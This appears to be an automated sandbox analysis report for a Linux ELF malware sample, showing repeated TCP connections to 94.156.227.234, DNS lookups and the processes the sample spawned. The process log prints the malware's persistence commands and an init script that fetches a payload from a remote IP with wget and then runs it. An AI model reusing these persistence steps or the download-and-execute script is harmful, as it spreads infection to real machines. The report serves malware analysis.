Dec 24, 2024 05:59:09.740050077 CET	38242	38292	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:09.740123034 CET	38292	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:10.112345934 CET	38294	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:10.232100964 CET	38242	38294	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:10.232168913 CET	38294	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:10.232338905 CET	38294	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:10.351843119 CET	38242	38294	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:10.747469902 CET	38294	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:10.909688950 CET	38242	38294	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:11.364119053 CET	38242	38294	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:11.364243984 CET	38294	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:11.749022961 CET	38296	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:11.868772030 CET	38242	38296	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:11.869009018 CET	38296	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:11.869009018 CET	38296	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:11.988646984 CET	38242	38296	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:12.374337912 CET	38296	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:12.537673950 CET	38242	38296	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:12.989361048 CET	38242	38296	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:12.989516973 CET	38296	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:13.375302076 CET	38298	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:13.494982958 CET	38242	38298	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:13.495132923 CET	38298	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:13.495196104 CET	38298	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:13.614729881 CET	38242	38298	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:13.999579906 CET	38298	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:14.161609888 CET	38242	38298	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:14.623608112 CET	38242	38298	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:14.623703957 CET	38298	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:15.000727892 CET	38300	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:15.120703936 CET	38242	38300	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:15.120822906 CET	38300	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:15.120862961 CET	38300	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:15.240520954 CET	38242	38300	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:15.625567913 CET	38300	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:15.789594889 CET	38242	38300	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:16.240950108 CET	38242	38300	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:16.241070986 CET	38300	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:16.626948118 CET	38302	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:16.746629953 CET	38242	38302	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:16.746700048 CET	38302	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:16.746747017 CET	38302	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:16.866350889 CET	38242	38302	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:17.251770020 CET	38302	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:17.413698912 CET	38242	38302	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:18.253411055 CET	38304	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:18.373300076 CET	38242	38304	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:18.373408079 CET	38304	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:18.373569965 CET	38304	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:18.493135929 CET	38242	38304	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:18.879014969 CET	38304	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:19.006562948 CET	38242	38278	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:19.006697893 CET	38278	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:19.041687965 CET	38242	38304	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:19.491110086 CET	38242	38304	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:19.491364956 CET	38304	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:19.880506992 CET	38306	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:20.000305891 CET	38242	38306	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:20.000431061 CET	38306	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:20.000493050 CET	38306	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:20.120362997 CET	38242	38306	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:20.505121946 CET	38306	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:20.669666052 CET	38242	38306	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:21.126245022 CET	38242	38306	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:21.126333952 CET	38306	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:21.506097078 CET	38308	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:21.625746965 CET	38242	38308	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:21.625951052 CET	38308	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:21.625993013 CET	38308	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:21.745587111 CET	38242	38308	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:22.129458904 CET	38308	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:22.289639950 CET	38242	38308	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:22.750049114 CET	38242	38308	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:22.750108004 CET	38308	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:23.130574942 CET	38310	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:23.250432968 CET	38242	38310	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:23.250499964 CET	38310	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:23.252481937 CET	38310	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:23.372004032 CET	38242	38310	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:23.756550074 CET	38310	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:23.917684078 CET	38242	38310	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:24.380855083 CET	38242	38310	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:24.380919933 CET	38310	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:24.757524967 CET	38312	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:24.877194881 CET	38242	38312	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:24.877507925 CET	38312	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:24.877507925 CET	38312	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:24.997155905 CET	38242	38312	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:25.380332947 CET	38312	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:25.541701078 CET	38242	38312	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:26.225415945 CET	38242	38312	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:26.225533009 CET	38312	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:26.381073952 CET	38314	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:26.500742912 CET	38242	38314	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:26.500818968 CET	38314	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:26.500818968 CET	38314	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:26.620476007 CET	38242	38314	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:27.003897905 CET	38314	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:27.170391083 CET	38242	38314	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:27.626296043 CET	38242	38314	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:27.626395941 CET	38314	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:28.004668951 CET	38316	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:28.124483109 CET	38242	38316	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:28.124547958 CET	38316	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:28.124577045 CET	38316	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:28.244163990 CET	38242	38316	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:28.628290892 CET	38316	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:28.791227102 CET	38242	38316	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:29.250375032 CET	38242	38316	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:29.250503063 CET	38316	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:29.629244089 CET	38318	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:29.748940945 CET	38242	38318	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:29.749034882 CET	38318	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:29.749073982 CET	38318	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:29.868680954 CET	38242	38318	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:30.254141092 CET	38318	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:30.417912960 CET	38242	38318	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:30.870343924 CET	38242	38318	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:30.870538950 CET	38318	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:31.255608082 CET	38320	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:31.375241041 CET	38242	38320	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:31.375336885 CET	38320	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:31.375426054 CET	38320	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:31.495363951 CET	38242	38320	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:31.880187035 CET	38320	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:32.271914005 CET	38320	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:32.448482990 CET	38242	38320	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:32.515773058 CET	38242	38320	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:32.516025066 CET	38320	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:32.881330013 CET	38322	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:33.001034975 CET	38242	38322	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:33.001190901 CET	38322	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:33.001533985 CET	38322	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:33.121269941 CET	38242	38322	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:33.505317926 CET	38322	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:33.665882111 CET	38242	38322	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:34.124439001 CET	38242	38322	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:34.124655962 CET	38322	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:34.506414890 CET	38324	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:34.626038074 CET	38242	38324	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:34.626113892 CET	38324	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:34.626168966 CET	38324	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:34.745753050 CET	38242	38324	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:35.130776882 CET	38324	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:35.293922901 CET	38242	38324	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:35.755198956 CET	38242	38324	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:35.755311012 CET	38324	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:36.131936073 CET	38326	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:36.251538992 CET	38242	38326	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:36.251626968 CET	38326	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:36.251681089 CET	38326	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:36.371239901 CET	38242	38326	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:36.756937027 CET	38326	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:36.918947935 CET	38242	38326	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:37.381242990 CET	38242	38326	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:37.381402016 CET	38326	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:37.758410931 CET	38328	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:37.878052950 CET	38242	38328	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:37.878153086 CET	38328	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:37.878174067 CET	38328	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:37.997797012 CET	38242	38328	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:38.383186102 CET	38328	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:38.552051067 CET	38242	38328	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:38.663260937 CET	38242	38302	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:38.663341999 CET	38302	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:38.995922089 CET	38242	38328	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:38.996045113 CET	38328	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:39.384011030 CET	38330	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:39.503607035 CET	38242	38330	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:39.503789902 CET	38330	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:39.503789902 CET	38330	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:39.623491049 CET	38242	38330	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:40.008747101 CET	38330	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:40.173814058 CET	38242	38330	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:41.010186911 CET	38332	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:41.129995108 CET	38242	38332	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:41.130075932 CET	38332	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:41.130127907 CET	38332	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:41.249800920 CET	38242	38332	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:41.636101007 CET	38332	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:41.797833920 CET	38242	38332	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:42.253619909 CET	38242	38332	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:42.253933907 CET	38332	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:42.637412071 CET	38334	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:42.757004023 CET	38242	38334	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:42.757139921 CET	38334	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:42.757380962 CET	38334	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:42.876880884 CET	38242	38334	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:43.262659073 CET	38334	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:43.425877094 CET	38242	38334	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:43.882464886 CET	38242	38334	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:43.882529020 CET	38334	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:44.264141083 CET	38336	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:44.383848906 CET	38242	38336	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:44.383924007 CET	38336	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:44.384000063 CET	38336	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:44.503577948 CET	38242	38336	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:44.888863087 CET	38336	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:45.050024033 CET	38242	38336	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:45.505920887 CET	38242	38336	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:45.506088018 CET	38336	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:45.890244961 CET	38338	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:46.009916067 CET	38242	38338	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:46.010005951 CET	38338	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:46.010077000 CET	38338	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:46.129931927 CET	38242	38338	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:46.514386892 CET	38338	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:46.677884102 CET	38242	38338	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:47.138345003 CET	38242	38338	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:47.138422966 CET	38338	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:47.515642881 CET	38340	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:47.635293007 CET	38242	38340	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:47.635406971 CET	38340	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:47.635457993 CET	38340	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:47.754993916 CET	38242	38340	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:48.141009092 CET	38340	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:48.304486990 CET	38242	38340	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:48.760829926 CET	38242	38340	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:48.760970116 CET	38340	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:49.142095089 CET	38342	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:49.261732101 CET	38242	38342	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:49.261945009 CET	38342	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:49.261945009 CET	38342	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:49.381567955 CET	38242	38342	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:49.767913103 CET	38342	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:49.929908991 CET	38242	38342	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:50.402718067 CET	38242	38342	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:50.402816057 CET	38342	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:50.769500971 CET	38344	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:50.889379978 CET	38242	38344	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:50.889468908 CET	38344	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:50.889498949 CET	38344	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:51.009198904 CET	38242	38344	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:51.395149946 CET	38344	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:51.561888933 CET	38242	38344	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:52.005491972 CET	38242	38344	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:52.005594015 CET	38344	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:52.396785975 CET	38346	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:52.516417980 CET	38242	38346	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:52.516592979 CET	38346	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:52.516592979 CET	38346	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:52.636230946 CET	38242	38346	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:53.022583008 CET	38346	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:53.185962915 CET	38242	38346	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:53.646985054 CET	38242	38346	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:53.647064924 CET	38346	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:54.024141073 CET	38348	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:54.144063950 CET	38242	38348	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:54.144155979 CET	38348	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:54.144206047 CET	38348	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:54.263778925 CET	38242	38348	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:54.649457932 CET	38348	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:54.813977957 CET	38242	38348	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:55.279645920 CET	38242	38348	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:55.279717922 CET	38348	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:55.651067972 CET	38350	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:55.770678997 CET	38242	38350	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:55.770775080 CET	38350	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:55.770843029 CET	38350	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:55.890350103 CET	38242	38350	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:56.276123047 CET	38350	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:56.438107967 CET	38242	38350	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:56.893104076 CET	38242	38350	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:56.893290043 CET	38350	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:57.277931929 CET	38352	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:57.640383959 CET	38242	38352	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:57.640517950 CET	38352	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:57.640661955 CET	38352	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:57.760696888 CET	38242	38352	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:58.148915052 CET	38352	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:58.310030937 CET	38242	38352	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:58.773317099 CET	38242	38352	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:58.773401022 CET	38352	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:59.150959015 CET	38354	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:59.270653009 CET	38242	38354	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:59.270733118 CET	38354	38242	192.168.2.15	94.156.227.234

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 05:57:55.166635036 CET	43643	53	192.168.2.15	1.1.1.1
Dec 24, 2024 05:57:55.166717052 CET	44225	53	192.168.2.15	1.1.1.1
Dec 24, 2024 05:57:55.392919064 CET	53	43643	1.1.1.1	192.168.2.15
Dec 24, 2024 05:57:55.399039030 CET	53	44225	1.1.1.1	192.168.2.15

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 24, 2024 05:57:55.166635036 CET	192.168.2.15	1.1.1.1	0xa2c2	Standard query (0)	daisy.ubuntu.com	A (IP address)	IN (0x0001)	false
Dec 24, 2024 05:57:55.166717052 CET	192.168.2.15	1.1.1.1	0x9072	Standard query (0)	daisy.ubuntu.com	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 24, 2024 05:57:55.392919064 CET	1.1.1.1	192.168.2.15	0xa2c2	No error (0)	daisy.ubuntu.com		162.213.35.25	A (IP address)	IN (0x0001)	false
Dec 24, 2024 05:57:55.392919064 CET	1.1.1.1	192.168.2.15	0xa2c2	No error (0)	daisy.ubuntu.com		162.213.35.24	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: x86_64.nn.elf PID: 5528, Parent PID: 5452

General

Start time (UTC):	04:57:51
Start date (UTC):	24/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	/tmp/x86_64.nn.elf
File size:	80064 bytes
MD5 hash:	3c2e0d786a9ca6565062a422428fe948

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	3c2e0d786a9ca6565062a422428fe948

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "systemctl enable custom.service >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable custom.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	3c2e0d786a9ca6565062a422428fe948

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/system
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	3c2e0d786a9ca6565062a422428fe948

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/system /etc/rcS.d/S99system
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	3c2e0d786a9ca6565062a422428fe948

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:57:52
